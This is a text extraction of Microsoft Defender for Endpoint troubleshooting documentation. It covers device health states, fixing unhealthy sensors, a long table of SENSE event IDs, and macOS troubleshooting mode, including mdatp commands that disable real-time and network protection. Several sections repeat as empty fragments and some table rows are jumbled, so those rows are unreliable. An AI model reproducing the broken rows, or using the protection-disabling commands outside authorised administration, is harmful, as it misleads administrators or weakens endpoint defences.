1. As a local administrator on the server, open Command Prompt.
2. Run the following command: MpCmdRun.exe -wdenable
3. Restart the device.
See also
Onboarding tools and methods for Windows devices in Defender for Endpoint
 Tip
Feedback

Check service health at Microsoft
Article • 07/18/2023
Applies to:

The Device health tile provides information on the individual device's ability to provide
sensor data and communicate with the Defender for Endpoint service. It reports how
many devices require attention and helps you identify problematic devices and take
action to correct known issues.
There are two status indicators on the tile that provide information on the number of
devices that aren't reporting properly to the service:
Misconfigured - These devices might partially be reporting sensor data to the

Defender for Endpoint service and might have configuration errors that need to be
corrected.
Inactive - Devices that have stopped reporting to the Defender for Endpoint
service for more than seven days in the past month.
Clicking any of the groups directs you to Device inventory, filtered according to your
choice.
On Device inventory, you can filter the health state list by the following status:
Active - Devices that are actively reporting to the Defender for Endpoint service.
Misconfigured - These devices might partially be reporting sensor data to the
Defender for Endpoint service but have configuration errors that need to be
corrected. Misconfigured devices can have either one or a combination of the
following issues:
No sensor data - Devices has stopped sending sensor data. Limited alerts can
be triggered from the device.
Impaired communications - Ability to communicate with device is impaired.
Sending files for deep analysis, blocking files, isolating device from network and
other actions that require communication with the device may not work.
Inactive - Devices that have stopped reporting to the Defender for Endpoint
service.
You can also download the entire list in CSV format using the Export feature. For more
information on filters, see View and organize the Devices list.
７ Note
Export the list in CSV format to display the unfiltered data. The CSV file will include
all devices in the organization, regardless of any filtering applied in the view itself
and can take a significant amount of time to download, depending on how large
your organization is.
You can view the device details when you click on a misconfigured or inactive device.
See also
Fix unhealthy sensors in Defender for Endpoint
Client analyzer overview
Download and run the client analyzer
Run the client analyzer on Windows
Run the client analyzer on macOS or Linux
Data collection for advanced troubleshooting on Windows
 Tip
Feedback

Fix unhealthy sensors in Microsoft
Article • 07/18/2023
Applies to:

Devices can be categorized as misconfigured or inactive are flagged for varying causes.
This section provides some explanations as to what might have caused a device to be
categorized as inactive or misconfigured.
Inactive devices
An inactive device isn't necessarily flagged because of an issue. The following actions
taken on a device can cause a device to be categorized as inactive:
Device isn't in use

Device was reinstalled or renamed
Device was offboarded
Device isn't sending signals
Device isn't in use

Any device that isn't in use for more than seven days retains 'Inactive' status in the
portal.

A new device entity is generated in Microsoft Defender XDR for reinstalled or renamed
devices. The previous device entity remains, with an 'Inactive' status in the portal. If you
reinstalled a device and deployed the Defender for Endpoint package, search for the
new device name to verify that the device is reporting normally.

If the device was offboarded, it still appears in devices list. After seven days, the device
health state should change to inactive.

If the device isn't sending any signals to any Microsoft Defender for Endpoint channels
for more than seven days for any reason, a device can be considered inactive; this
includes conditions that fall under misconfigured devices classification.
Do you expect a device to be in 'Active' status? Open a support ticket .
Misconfigured devices
Impaired communications
No sensor data
This status indicates that there's limited communication between the device and the
service.
The following suggested actions can help fix issues related to a misconfigured device
with impaired communications:
Ensure the device has Internet connection

(WinHTTP) to report sensor data and communicate with the Microsoft Defender
for Endpoint service.
Verify client connectivity to Microsoft Defender for Endpoint service URLs

Verify the proxy configuration completed successfully, that WinHTTP can discover
and communicate through the proxy server in your environment, and that the
proxy server allows traffic to the Microsoft Defender for Endpoint service URLs.
If you took corrective actions and the device status is still misconfigured, open a support
ticket .
No sensor data
A misconfigured device with status 'No sensor data' has communication with the service
but can only report partial sensor data.
Follow theses actions to correct known issues related to a misconfigured device with
status 'No sensor data':



If the devices aren't reporting correctly, you should verify that the Windows
diagnostic data service is set to automatically start. Also verify that the Windows
diagnostic data service is running on the endpoint.
Ensure that Microsoft Defender Antivirus isn't disabled by policy

If your devices are running a third-party antimalware client, Defender for Endpoint
agent requires that the Microsoft Defender Antivirus Early Launch Antimalware
(ELAM) driver is enabled.
ticket .
See also
Check sensor health state in Microsoft Defender for Endpoint
 Tip
Feedback

Article • 07/18/2023
Applies to:

Inactive devices
Device isn't in use

Device isn't in use

portal.



No sensor data
service.


ticket .
No sensor data




ticket .
See also
 Tip
Feedback

Article • 07/18/2023
Applies to:

Inactive devices
Device isn't in use

Device isn't in use

portal.



No sensor data
service.


ticket .
No sensor data




ticket .
See also
 Tip
Feedback

Review events and errors using Event Viewer
Article • 10/27/2023
Applies to:

View events in the Defender for Endpoint service event

log
You can review event IDs in the Event Viewer on individual devices. This can help when, for example, a
device isn't appearing in the Devices list. In this scenario, you can look for event IDs on the device and
then use the table below to determine further troubleshooting steps based on the corresponding
event ID.
To open the Defender for Endpoint service event log:
1. Select Start on the Windows menu, type Event Viewer, and press Enter to open the Event Viewer.
2. In the log list, under Log Summary, scroll until you see Microsoft-Windows-SENSE/Operational.
Double-click the item to open the log.
You can also access the log by expanding Applications and Services Logs > Microsoft >
Windows > SENSE and select Operational.
７ Note
SENSE is the internal name used to refer to the behavioral sensor that powers Microsoft
3. Events recorded by the service appear in the log.
See the following table for a list of events recorded by the service.
ﾉ Expand table
Event Message Description Action

ID
1 Microsoft Occurs during system startup, Normal operating notification; no action required.
Defender for shut down, and during
Endpoint service onboarding.
started (Version
variable ).
ID
2 Microsoft Occurs when the device is Normal operating notification; no action required.
Defender for shut down or offboarded.
Endpoint service
shutdown.
3 Microsoft Service didn't start. Review other messages to determine possible cause and
Defender for troubleshooting steps.
Endpoint service
failed to start.
Failure code:
variable .
4 Microsoft Variable = URL of the Normal operating notification; no action required.

Defender for Defender for Endpoint
Endpoint service processing servers.
contacted the
server at This URL matches that seen in
variable . the Firewall or network
activity.
5 Microsoft Variable = URL of the Check the connection to the URL. See Configure proxy and
Defender for Defender for Endpoint Internet connectivity.
Endpoint service processing servers.
failed to connect
to the server at The service couldn't contact
variable . the external processing
servers at that URL.
6 Microsoft The device didn't onboard Onboarding must be run before starting the service.
Defender for correctly and isn't reporting
Endpoint service to the portal. Check that the onboarding settings and scripts were
isn't onboarded deployed properly. Try to redeploy the configuration
and no packages.
onboarding
parameters were See Onboard Windows client devices.
found.
7 Microsoft Variable = detailed error Check that the onboarding settings and scripts were
Defender for description. The device didn't deployed properly. Try to redeploy the configuration
Endpoint service onboard correctly and isn't packages.
failed to read the reporting to the portal.
onboarding See Onboard Windows client devices.
parameters.
Failure: variable .
8 Microsoft During onboarding: The Onboarding: No action required.

Defender for service failed to clean its
Endpoint service configuration during the Offboarding: Reboot the system.
failed to clean its onboarding. The onboarding
configuration. process continues. See Onboard Windows client devices.
Failure code:
variable . During offboarding: The
service failed to clean its
configuration during the
ID
offboarding. The offboarding

process finished but the
service keeps running.
9 Microsoft During onboarding: The Check that the onboarding settings and scripts were
Defender for device didn't onboard deployed properly. Try to redeploy the configuration
Endpoint service correctly and isn't reporting packages.
failed to change to the portal.
its start type. See Onboard Windows client devices.
Failure code: During offboarding: Failed to
variable . change the service start type.
The offboarding process
continues.
10 Microsoft The device didn't onboard Check that the onboarding settings and scripts were
Defender for correctly and isn't reporting deployed properly. Try to redeploy the configuration
Endpoint service to the portal. packages.
failed to persist
the onboarding See Onboard Windows client devices.
information.
Failure code:
variable .
11 Onboarding or The device onboarded Normal operating notification; no action required.

reonboarding of correctly.
Defender for It might take several hours for the device to appear in the
Endpoint service portal.
completed.
12 Microsoft Service was unable to apply This error should resolve after a short period of time.
Defender for the default configuration.
Endpoint failed to
apply the default
configuration.
13 Microsoft Normal operating process. Normal operating notification; no action required.

Defender for
Endpoint device
ID calculated:
variable .
15 Microsoft Variable = URL of the Check the connection to the URL. See Configure proxy and
Defender for Defender for Endpoint Internet connectivity.
Endpoint can't processing servers.
start command
channel with URL: The service couldn't contact
variable . the external processing
servers at that URL.
17 Microsoft An error occurred with the Ensure the diagnostic data service is enabled">Ensure the
Defender for Windows telemetry service. diagnostic data service is enabled.
Endpoint service
failed to change Check that the onboarding settings and scripts were
the Connected deployed properly. Try to redeploy the configuration
User Experiences packages.
ID
and Telemetry
service location. See Onboard Windows client devices.
Failure code:
variable .
18 OOBE (Windows Service will only start after any Normal operating notification; no action required.
Welcome) is Windows updates have
completed. finished installing.
19 OOBE (Windows Service will only start after any Normal operating notification; no action required.
Welcome) hasn't Windows updates finish
yet completed. installing. If this error persists after a system restart, ensure all
Windows updates have full installed.
20 Can't wait for Internal error. If this error persists after a system restart, ensure all
OOBE (Windows Windows updates are installed.
Welcome) to
complete. Failure
code: variable .
Defender for correctly. It reports to the deployed properly. Try to redeploy the configuration
Endpoint service portal; however, the service packages.
failed to reset might not appear as
health status in registered in SCCM or the See Onboard Windows client devices.
the registry. registry.
Failure code:
variable .
Defender for correctly. deployed properly. Try to redeploy the configuration
Endpoint service packages.
failed to set the It reports to the portal;
onboarding status however the service may not See Onboard Windows client devices.
in the registry. appear as registered in SCCM
Failure code: or the registry.
variable .
27 Microsoft Normally, Microsoft Defender Check that the onboarding settings and scripts were
Defender for Antivirus enters a special deployed properly. Try to redeploy the configuration
Endpoint service passive state if another real- packages.
failed to enable time antimalware product is
SENSE aware running properly on the See Onboard Windows client devices.
mode in device, and the device is
Microsoft reporting to Defender for Ensure real-time antimalware protection is running properly.
Defender Endpoint.
Antivirus.
Onboarding
process failed.
Failure code:
variable .
28 Microsoft An error occurred with the Ensure the diagnostic data service is enabled.
Defender for Windows telemetry service.
Endpoint Check that the onboarding settings and scripts were
ID
Connected User deployed properly. Try to redeploy the configuration

Experiences and packages.
Telemetry service
registration failed. See Onboard Windows client devices.
Failure code:
variable .
29 Failed to read the This event occurs when the Ensure the device has Internet access, then run the entire
offboarding system can't read the offboarding process again. Ensure the offboarding package
parameters. Error offboarding parameters. isn't expired.
type: %1, Error
code: %2,
Description: %3
30 Microsoft Normally, Microsoft Defender Check that the onboarding settings and scripts were
Defender for Antivirus enters a special deployed properly. Try to redeploy the configuration
Endpoint service passive state if another real- packages.
failed to disable time antimalware product is
SENSE aware running properly on the See Onboard Windows client devices.
mode in device, and the device is
Microsoft reporting to Defender for Ensure real-time antimalware protection is running properly.
Defender Endpoint.
Antivirus. Failure
code: variable .
31 Microsoft An error occurred with the Check for errors with the Windows telemetry service.
Defender for Windows telemetry service
Endpoint during onboarding. The
Connected User offboarding process
Experiences and continues.
Telemetry service
unregistration
failed. Failure
code: variable .
32 Microsoft An error occurred during Reboot the device.

Defender for offboarding.
Endpoint service
failed to request
to stop itself after
offboarding
process. Failure
code: %1
33 Microsoft A unique identifier is used to Check registry permissions on the device to ensure the
Defender for represent each device that is service can update the registry.
Endpoint service reporting to the portal.
failed to persist
SENSE GUID. If the identifier doesn't
Failure code: persist, the same device might
variable . appear twice in the portal.
34 Microsoft An error occurred with the Ensure the diagnostic data service is enabled.
Defender for Windows telemetry service.
Endpoint service Check that the onboarding settings and scripts were
ID
failed to add itself deployed properly. Try to redeploy the configuration

as a dependency packages.
on the Connected
User Experiences See Onboard Windows client devices.
and Telemetry
service, causing
onboarding
process to fail.
Failure code:
variable .
35 Communication Variable = disk quota in MB. Normal operating notification; no action required.
quotas are
updated. Disk
quota in MB:
variable , daily
upload quota in
MB: variable
36 Microsoft Registering Defender for Normal operating notification; no action required.

Defender for Endpoint with the Connected
Endpoint User Experiences and
Connected User Telemetry service completed
Experiences and successfully.
Telemetry service
registration
succeeded.
Completion code:
variable .
37 Microsoft The device is near its Normal operating notification; no action required.
Defender for allocated quota of the current
Endpoint A 24-hour window. It's about to
module is about be throttled.
to exceed its
quota. Module:
%1, Quota: {%2}
{%3}, Percentage
of quota
utilization: %4.
38 Network The device is using a Normal operating notification; no action required.

connection is metered/paid network and
identified as low. contacts the server less
Microsoft frequently.
Defender for
Endpoint contacts
the server every
%1 minutes.
Metered
connection: %2,
internet available:
%3, free network
available: %4.
ID
39 Network The device isn't using a Normal operating notification; no action required.
connection is metered/paid connection and
identified as contacts the server as usual.
normal. Microsoft
Defender for
Endpoint contacts
the server every
%1 minutes.
Metered
connection: %2,
internet available:
%3, free network
available: %4.
40 Battery state is The device has low battery Normal operating notification; no action required.
identified as low. level and contacts the server
Microsoft less frequently.
Defender for
Endpoint contacts
the server every
%1 minutes.
Battery state: %2.
41 Battery state is The device doesn't have low Normal operating notification; no action required.
identified as battery level and contacts the
normal. Microsoft server as usual.
Defender for
Endpoint contacts
the server every
%1 minutes.
Battery state: %2.
42 Microsoft Internal error. The service If this error persists, contact Support.
Defender for failed to start.
Endpoint
component failed
to perform action.
Component: %1,
Action: %2,
Exception Type:
%3, Exception
message: %4
43 Microsoft Internal error. The service If this error persists, contact Support.
Endpoint
component failed
to perform action.
Component: %1,
Action: %2,
Exception Type:
%3, Exception
Error: %4,
ID
Exception
message: %5
44 Offboarding of The service was offboarded. Normal operating notification; no action required.
Defender for
Endpoint service
completed.
45 Failed to register An error occurred on service If this error persists, contact Support.
and to start the startup while creating ETW
event trace session. This caused service
session [%1]. Error start-up failure.
code: %2
46 Failed to register An error occurred on service Normal operating notification; no action required. The
and start the startup while creating ETW service tries to start the session every minute.
event trace session due to lack of
session [%1] due resources. The service is
to lack of running, but doesn't report
resources. Error sensor events until the ETW
code: %2. This is session starts.
most likely
because there are
too many active
event trace
sessions. The
service retries in 1
minute.
47 Successfully This event follows the Normal operating notification; no action required.
registered and previous event after
started the event successfully starting of the
trace session - ETW session.
recovered after
previous failed
attempts.
48 Failed to add a Failed to add a provider to Check the error code. If the error persists contact Support.
provider [%1] to ETW session. As a result, the
event trace provider events aren't
session [%2]. Error reported.
code: %3. This
means that events
from this provider
aren't reported.
49 Invalid cloud Received an invalid If this error persists, contact Support.

configuration configuration file from the
command cloud service that was
received and ignored.
ignored. Version:
%1, status: %2,
error code: %3,
message: %4
ID
50 New cloud Successfully applied a new Normal operating notification; no action required.
configuration configuration from the cloud
applied service.
successfully.
Version: %1.
51 New cloud Received a bad configuration If this error persists, contact Support.
configuration file from the cloud service.
failed to apply, Last known good
version: %1. configuration was applied
Successfully successfully.
applied the last
known good
configuration,
version %2.
52 New cloud Received a bad configuration The service will attempt to download a new configuration
configuration file from the cloud service. file within 5 minutes. If you don't see event #50 - contact
failed to apply, Failed to apply the last known Support.
version: %1. Also good configuration - and the
failed to apply default configuration was
last known good applied.
configuration,
version %2.
Successfully
applied the
default
configuration.
53 Cloud The configuration was loaded Normal operating notification; no action required.
configuration from persistent storage on
loaded from service startup.
persistent
storage, version:
%1.
54 Global (per- If state = 0: Cyber-data Normal operating notification; no action required.

pattern) state reporting rule has reached its
changed. State: defined capping quota and
%1, pattern: %2 doesn't send more data until
the capping quota expires. If
state = 1: The capping quota
expired and the rule will
resume sending data.
55 Failed to create Failed to create the secure Reboot the device. If this error persists, contact Support.
the Secure ETW ETW logger.
autologger.
Failure code: %1
56 Failed to remove Failed to remove the secure Contact Support.

the Secure ETW ETW session on offboarding.
autologger.
Failure code: %1
ID
57 Capturing a An investigation package, also Normal operating notification; no action required.

snapshot of the known as forensics package,
machine for is being collected.
troubleshooting
purposes.
59 Starting Starting response command Normal operating notification; no action required.

command: %1 execution.
60 Failed to run Failed to execute response If this error persists, contact Support.
command %1, command.
error: %2.
61 Data collection Failed to read or parse the If this error persists, contact Support.
command data collection command
parameters are arguments (invalid
invalid: SasUri: arguments).
%1,
compressionLevel:
%2.
62 Failed to start Connected User Experiences Look for more troubleshooting hints in the event log:
Connected User and Telemetry (diagtrack) Microsoft-Windows-UniversalTelemetryClient/Operational.
Experiences and service failed to start. Non-
Telemetry service. Microsoft Defender for
Failure code: %1 Endpoint telemetry isn't sent
from this machine.
63 Updating the start Updated start type of the Normal operating notification; no action required.
type of external external service.
service. Name:
%1, actual start
type: %2,
expected start
type: %3, exit
code: %4
64 Starting stopped Starting an external service. Normal operating notification; no action required.
external service.
Name: %1, exit
code: %2
65 Failed to load Failed to load MsSecFlt.sys Reboot the device. If this error persists, contact Support.
Microsoft Security filesystem minifilter.
Events
Component
Minifilter driver.
Failure code: %1
66 Policy update: The C&C connection Normal operating notification; no action required.
Latency mode - frequency policy was updated.
%1
68 The start type of Unexpected external service Fix the external service start type.
the service is start type.
ID
unexpected.
Service name: %1,
actual start type:
%2, expected
start type: %3
69 The service is The external service is Start the external service.

stopped. Service stopped.
name: %1
70 Policy update: The sample collection policy Normal operating notification; no action required.
Allow sample was updated.
collection - %1
71 Succeeded to run The command was executed Normal operating notification; no action required.
command: %1 successfully.
72 Tried to send first Informational only. Normal operating notification; no action required.
full machine
profile report.
Result code: %1
73 Sense starting for Informational only. Normal operating notification; no action required.
platform: %1
74 Device tag in The device tag exceeds the Use a shorter device tag.
registry exceeds length limit.
length limit. Tag
name: %2. Length
limit: %1.
81 Failed to create Failed to create the ETW Reboot the device. If this error persists, contact Support.
Microsoft session.
Defender for
Endpoint ETW
autologger.
Failure code: %1
82 Failed to remove Failed to delete the ETW Contact Support.

Microsoft session.
Defender for
Endpoint ETW
autologger.
Failure code: %1
84 Set Microsoft Set defender running mode Normal operating notification; no action required.
Defender (active or passive).
Antivirus running
mode. Force
passive mode:
%1, result code:
%2.
85 Failed to trigger Starring SenseIR executable Reboot the device. If this error persists, contact Support.
Microsoft failed.
Defender for
ID
Endpoint
executable.
Failure code: %1
86 Starting again Starting the external service Normal operating notification; no action required.
stopped external again.
service that
should be up.
Name: %1, exit
code: %2
87 Cannot start the Failed to start the external Contact Support.

external service. service.
Name: %1
88 Updating the start Updated the start type of the Normal operating notification; no action required.
type of external external service.
service again.
Name: %1, actual
start type: %2,
expected start
type: %3, exit
code: %4
89 Cannot update Can't update the start type of Contact Support.

the start type of the external service.
external service.
Name: %1, actual
start type: %2,
expected start
type: %3
90 Failed to System Guard Runtime Check the permissions on register path:

configure System Monitor doesn't send "HKLM\Software\Microsoft\Windows\CurrentVersion\Sgrm".
Guard Runtime attestation data to the cloud If no issues spotted, contact Support.
Monitor to service.
connect to cloud
service in geo-
region %1. Failure
code: %2
91 Failed to remove System Guard Runtime Check the permissions on register path:
System Guard Monitor doesn't send "HKLM\Software\Microsoft\Windows\CurrentVersion\Sgrm".
Runtime Monitor attestation data to the cloud If no issues spotted, contact Support.
geo-region service.
information.
Failure code: %1
92 Stopping sending Exceed throttling limit. Normal operating notification; no action required.
sensor cyber data
quota because
data quota is
exceeded. Will
resume sending
once quota
ID
period passes.
State Mask: %1
93 Resuming Resume cyber data Normal operating notification; no action required.

sending sensor submission.
cyber data. State
Mask: %1
94 Microsoft The SenseCE executable has Normal operating notification; no action required.
Defender for started.
Endpoint
executable has
started
Defender for ended.
Endpoint
executable has
ended
Defender for called MCE initialization.
Endpoint Init has
called. Result
code: %2
97 There are There are network Check the network connectivity.

connectivity connectivity issues that affect
issues to the the DLP classification flow.
Cloud for the DLP
scenario
98 The connectivity The connectivity to the Normal operating notification; no action required.
to the Cloud for network was restored and the
the DLP scenario DLP classification flow can
has been restored continue.
99 Sense has A communication error Check the following events in the event log for further
encountered the occurred. details.
following error
while
communicating
with server: (%1).
Result: (%2)
100 Microsoft The SenseCE executable has Reboot the device. If this error persists, contact Support.
Endpoint
executable failed
to start. Failure
code: %1
102 Microsoft The SenseNdr executable has Normal operating notification; no action required.
Defender for started.
Endpoint Network
ID
Detection and
Response
executable has
started
103 Microsoft The SenseNdr executable has Normal operating notification; no action required.
Defender for ended.
Endpoint Network
Detection and
Response
executable has
ended
104 Failed to queue Occurs during offboarding. Normal operating notification; no action required.
asynchronous
driver unload.
Failure code: %1.
105 Failed to wait for Occurs during offboarding. Normal operating notification; no action required.
driver unload
106 Microsoft Occurs during startup. Contact support.

Defender for
Endpoint service
failed to start.
Failure code %1 ;
Failed to load
MsSense DLL.
Module.
107 Microsoft Occurs during startup. Contact support.

Defender for
Endpoint service
failed to start.
Failure code %1 ;
Issue with
MsSense DLL
Module.
108 Update phase:%1, Occurs during update. Normal operating notification; no action required.
new platform
version: %2,
message: %3.
109 Update phase:%1 Occurs during update. Contact support.

new platform
version: %2,
failure message:
%3, error: %4.
110 Failed to remove Occurs during offboarding. Contact support.

MDEContain WFP
filters.
ID
307 Failed to update Occurs during onboarding. Contact support.

driver permissions
Failure code: %1.
308 Failed to ACL on Occurs during onboarding. Contact support.

Folder %1 Failure
code: %2.
401 Microsoft Failed to create crypto key. If machine isn't reporting, contact support. Otherwise, no
Defender for action required.
Endpoint service
failed to generate
key. Failure code:
%1.
402 Microsoft Failed to persist If a device isn't reporting, contact support. Otherwise, no
Defender for authentication state. action required.
Endpoint service
failed to persist
authentication
state. Failure
code: %1.
403 Registration of Successful registration to Normal operating notification; no action required.

Microsoft authentication service.
Defender for
Endpoint service
completed.
404 Microsoft Successful crypto key Normal operating notification; no action required.
Defender for generation.
Endpoint service
successfully
generated a key.
405 Failed to Failed to send request to Normal operating notification; no action required.
communicate authentication service.
with
authentication
service. %1
request failed,
hresult: %2, HTTP
error code: %3.
406 Request for %1 Request returned undesired Normal operating notification; no action required.
rejected by response.
authentication
service. Hresult:
%2, error code:
%3.
407 Microsoft Failed to sign request. Normal operating notification; no action required.
Defender for
Endpoint service
failed to sign
ID
message
(authentication).
Failure code: %1.
408 Microsoft Failed to persist If a device isn't reporting, contact support. Otherwise, no
Defender for authentication state. action required.
Endpoint service
failed to remove
persist
authentication
state. State: %1,
Failure code: %2.
409 Microsoft Failed to open crypto key. If a device isn't reporting, contact support. Otherwise, no
Defender for action required.
Endpoint service
failed to open
key. Failure code:
%1.
410 Registration is Occurs during reonboarding. Normal operating notification; no action required.
required as part
of reonboarding
of Microsoft
Defender for
Endpoint service.
411 Cyber telemetry Cyber upload temporarily Normal operating notification; no action required.
upload has been suspended.
suspended for
Microsoft
Defender for
Endpoint service
due to
invalid/expired
token.
412 Cyber telemetry Cyber upload successfully Normal operating notification; no action required.
upload been resumed.
resumed for
Microsoft
Defender for
Endpoint service
due to newly
refreshed token.
1800 CSP: Get An operation of Get is about Contact support.

Node's to start.
Value. NodeId:
(%1), TokenName:
(%2).
1801 CSP: Failed to Get An operation of Get has Contact support.

Node's failed.
Value. NodeId:
ID
(%1), TokenName:
(%2), Result: (%3).
1802 CSP: Get An operation of Get has Contact support.

Node's succeeded.
Value complete.
NodeId: (%1),
TokenName: (%2),
Result: (%3).
1803 CSP: Get Last Last time the device Normal operating notification; no action required.
Connected value communicated with CNC.
complete. Result
(%1), IsDefault:
(%2).
1804 CSP: Get Org ID The org ID device get during Normal operating notification; no action required.
value complete. onboarding.
Result: (%1),
IsDefault: (%2).
1805 CSP: Get Sense Is Sense running message after Normal operating notification; no action required.
Running value onboarding.
complete. Result:
(%1).
1806 CSP: Get Get is Sense onboarded. Normal operating notification; no action required.
Onboarding State
value complete.
Result: (%1),
IsDefault: (%2).
1807 CSP: Get Get is Sense onboarded and Normal operating notification; no action required.
Onboarding value onboarding blob hash.
complete.
Onboarding Blob
Hash: (%1),
IsDefault: (%2),
Onboarding State:
(%3), Onboarding
State IsDefault:
(%4).
1808 CSP: Get Get offboarding blob hash. Normal operating notification; no action required.
Offboarding value
complete.
Offboarding Blob
Hash: (%1),
IsDefault: (%2).
1809 CSP: Get Sample Get is sample upload is Normal operating notification; no action required.
Sharing value allowed.
complete. Result:
(%1), IsDefault:
(%2).
ID
1810 CSP: Onboarding Started onboarding flow. Normal operating notification; no action required.
process. Started.
1811 CSP: Onboarding Deleted offboarding blob as Normal operating notification; no action required.
process. Delete part of onboarding flow.
Offboarding blob
complete. Result:
(%1).
1812 CSP: Onboarding Wrote onboarding blob to Normal operating notification; no action required.
process. Write registry as part of onboarding
Onboarding blob flow.
complete. Result:
(%1).
1813 CSP: Onboarding Started Sense service as part Normal operating notification; no action required.
process. The of onboarding flow.
service started
successfully.
1814 CSP: Onboarding Finished waiting for Sense to Normal operating notification; no action required.
process. Pending start as part of onboarding
service running flow.
state complete.
Result: (%1).
1815 CSP: Set Sample Set sample sharing value. Normal operating notification; no action required.
Sharing value
complete.
Previous Value:
(%1), IsDefault:
(%2), New Value:
(%3), Result: (%4).
1816 CSP: Offboarding Deleted onboarding blob as Normal operating notification; no action required.
process. Delete part of offboarding flow.
Onboarding blob
complete. Result
(%1).
1817 CSP: Offboarding Wrote offboarding blob to Normal operating notification; no action required.
process. Write registry as part of offboarding
Offboarding blob flow.
complete. Result
(%1).
1818 CSP: Set An operation of Set is about Normal operating notification; no action required.
Node's to start.
Value started.
NodeId: (%1),
TokenName: (%2).
1819 CSP: Failed to Set An operation of Set has failed. Contact support.
Node's
Value. NodeId:
ID
(%1), TokenName:
(%2), Result: (%3).
1820 CSP: Set An operation of Set has Normal operating notification; no action required.
Node's succeeded.
Value complete.
NodeId: (%1),
TokenName: (%2),
Result: (%3).
1821 CSP: Set Start setting the value of Normal operating notification; no action required.
Telemetry TelemetryReportingFrequency.
Reporting
Frequency
started. New
value: (%1).
1822 CSP: Set Finish setting the value of Normal operating notification; no action required.
Reporting
Frequency
complete.
Previous value:
(%1), IsDefault:
(%2), New value:
(%3), Result: (%4).
1823 CSP: Get Gets the value of Normal operating notification; no action required.
Reporting
Frequency
complete. Value:
(%1), Registry
Value: (%2),
IsDefault: (%3).
1824 CSP: Get Group Got groupIds from registry. Normal operating notification; no action required.
Ids complete.
Value: (%1),
IsDefault: (%2).
1825 CSP: Set Group Failed to set groupIds due to Normal operating notification; no action required.
Ids exceeded length.
allowed limit.
Allowed: (%1),
Actual: (%2).
1826 CSP: Set Group Set groupIds. Normal operating notification; no action required.
Ids complete.
Value: (%1),
Result: (%2).
1827 CSP: Onboarding Trace values as part of Normal operating notification; no action required.
process. Service is onboarding.
running: (%1),
ID
Previous
Onboarding Blob
Hash: (%2),
IsDefault: (%3),
Onboarding State:
(%4), Onboarding
State IsDefault:
(%5), New
Onboarding Blob
Hash: (%6).
1828 CSP: Onboarding Trace values as part of Normal operating notification; no action required.
process. Service is offboarding.
running: (%1),
Previous
Offboarding Blob
Hash: (%2),
IsDefault: (%3),
Onboarding State:
(%4), Onboarding
State IsDefault:
(%5), New
Offboarding Blob
Hash: (%6).
1829 CSP: Failed to Set Invalid value for Contact support.

Sample Sharing SampleSharing operation.
Value. Requested
Value: (%1),
Allowed Values
between (%2) and
(%3).
1830 CSP: Failed to Set Setting the value of Contact support if problem persists.
Telemetry TelemetryReportingFrequency
Reporting failed.
Frequency Value.
Requested Value:
(%1).
1831 CSP: Get Sense is Get SenseIsRunning result. Normal operating notification; no action required.
running. Service is
configured as
delay-start, and
hasn't
started yet.
1832 CSP: Get Device Get DeviceTagging Group Normal operating notification; no action required.
Tagging Group from registry completed.
complete. Value:
(%1), IsDefault:
(%2).
1833 CSP: Get Device Get DeviceTagging Criticality Normal operating notification; no action required.
Tagging Criticality from registry completed.
value complete. In
Registry: (%1),
ID
IsDefault: (%2),
Conversion
Succeeded: (%3),
Result: (%4).
1834 CSP: Get Device Get DeviceTagging Id Method Normal operating notification; no action required.
Tagging from registry completed.
Identification
Method value
complete. In
Registry: (%1),
IsDefault: (%2),
Conversion
Succeeded: (%3),
Result: (%4).
1835 CSP: Set Device Set DeviceTagging Group in Normal operating notification; no action required.
Tagging Group registry completed.
complete. Value:
(%1), Result: (%2).
1836 CSP: Set Device Set DeviceTagging Group Contact support if problem persists.
Tagging Group failed as maximum Length
exceeded allowed Limit exceeded.
limit. Allowed:
(%1), Actual: (%2).
1837 CSP: Set Device Set DeviceTagging Criticality Normal operating notification; no action required.
Tagging Criticality in registry completed.
value complete.
Previous Value:
(%1), IsDefault:
(%2), New Value:
(%3), Result: (%4).
1838 CSP: Failed to Set Set DeviceTagging Criticality Contact support if problem persists.
Device Tagging failed as value was not within
Criticality Value. expected range.
Requested Value:
(%1), Allowed
Values between
(%2) and (%3).
1839 CSP: Set Device Set DeviceTagging Id Method Normal operating notification; no action required.
Tagging in registry completed.
Identification
Method value
complete.
Previous Value:
(%1), IsDefault:
(%2), New Value:
(%3), Result: (%4).
1840 CSP: Failed to Set Set DeviceTagging Id Method Contact support if problem persists.
Device Tagging failed as value was not within
Identification expected range.
Method Value.
Requested Value:
ID
(%1), Allowed
Values between
(%2) and (%3).
View Defender for Endpoint events in the System event

log
Microsoft Defender for Endpoint events also appear in the System event log.
To open the System event log:
1. Select Start on the Windows menu, type Event Viewer, and press Enter to open the Event Viewer.
2. In the log list, under Log Summary, scroll until you see System. Double-click the item to open the
log.
You can use this table for more information on the Defender for Endpoint events in the System events
log and to determine further troubleshooting steps.
ﾉ Expand table

ID
1 The backing-file for the real-time This real-time session, between Pktmon - the built- Normal
session "SenseNdrPktmon" has in Windows service that captures network traffic, operating
reached its maximum size. As a and our agent (SenseNDR) - that analyzes packets notification; no
result, new events will not be asynchroniously, is configured to limited to prevent action
logged to this session until space potential performance issues. As a result, this alert required.
becomes available. may appear if too many packets are intercepted in a
short time period, causing some packets to be
skipped. This alert is more common with high
network traffic.
See also
Onboard Windows client devices
Configure device proxy and Internet connectivity settings
Understand the analyzer HTML report
 Tip
Feedback

Troubleshooting mode in Microsoft
Article • 02/12/2024
Applies to:

） Important
Some information relates to a pre-released product feature in public preview which

This article describes how to enable the troubleshooting mode in Microsoft Defender for
Endpoint on macOS so admins can troubleshoot various Microsoft Defender Antivirus
features temporarily, even if organizational policies manage the devices.
For example, if the tamper protection is enabled, certain settings can't be modified or
turned off, but you can use troubleshooting mode on the device to edit those settings
temporarily.
Troubleshooting mode is disabled by default, and requires you to turn it on for a device
(and/or group of devices) for a limited time. Troubleshooting mode is exclusively an
enterprise-only feature, and requires access to Microsoft Defender XDR portal .
What do you need to know before you begin

During the troubleshooting mode, you can:
Use Microsoft Defender for Endpoint on macOS functional troubleshooting

/application compatibility (false positives).
Local admins, with appropriate permissions, can change the following policy
locked configurations on individual endpoints:
ﾉ Expand table
Setting Enable Disable/Remove
Real-Time Protection/ Passive mdatp config real-time- mdatp config real-time-

mode / On-Demand protection --value protection --value
enabled disabled
Network Protection mdatp config network- mdatp config network-

protection enforcement- protection enforcement-
level --value block level --value disabled
realTimeProtectionStatistics mdatp config real-time- mdatp config real-time-

protection-statistics -- protection-statistics --
value enabled value disabled
tags mdatp edr tag set --name mdatp edr tag remove --
GROUP --value [name] tag-name [name]
